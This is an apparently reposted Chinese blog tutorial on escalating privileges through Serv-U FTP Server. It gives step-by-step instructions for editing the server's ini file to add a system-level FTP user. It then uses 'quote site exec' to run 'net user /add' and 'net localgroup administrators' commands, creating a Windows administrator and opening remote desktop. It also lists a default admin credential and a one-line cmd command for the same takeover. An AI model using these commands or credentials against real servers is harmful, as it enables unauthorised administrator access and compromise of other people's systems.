经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
第三方软件 Serv-u提权
来源:cnblogs  作者:痱子﹑  时间:2019/5/20 8:52:12  对本文有异议

 

Serv-U FTP Server,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等 

 Serv-U提权分两种

1.有修改权限

2.无权限修改

 

第一种情况时

0.判断是否安装serv-u

serv-u的默认端口是43958  可以用nmap 扫描确认 

1.检查是否有可写权限

一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini

 打开配置文件

 2.增加用户

在user4=添加一个系统用户

复制一个 修改名字

password 密码格式 是  gw+md5     我从https://www.cmd5.com/   把gw123456  加密  注意gw是他的 盐 属于密码规则   

把加密完的密码去替换复制的密码  password=gw+md5(gw123456)

maintenance=system   是代表系统权限  user=你命名的用户 

cmd访问 ftp 连接  ip  输入你刚刚添加的用户密码 

输入  

quote site exec net user username password /add

quote site exec net localgroup administrators username /add  

利用ftp命令quote site exec 添加用户 加入administrators 权限组

打开3389连接

  第二种情况无修改权限

1.利用md5 直接去解密(ini 文件密码在ftp连)

2.默认密码,默认用户

账户:LocalAdministrator ,密码:#l@$ak#.lk;0@P

命令cmd /c net user DisKill /add & net localgroup administrators DisKill /add

 3.不是默认密码时 直接把SerUAdmin.exe 下载下来 进行查看密码

 

直接记住这里选an字符串

 

 

. 后面就是密码  把它替换到

 

这也叫溢出提权

至此常用的方式都已经说了。

原文链接:http://www.cnblogs.com/yuanzijian-ruiec/p/10891352.html

 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号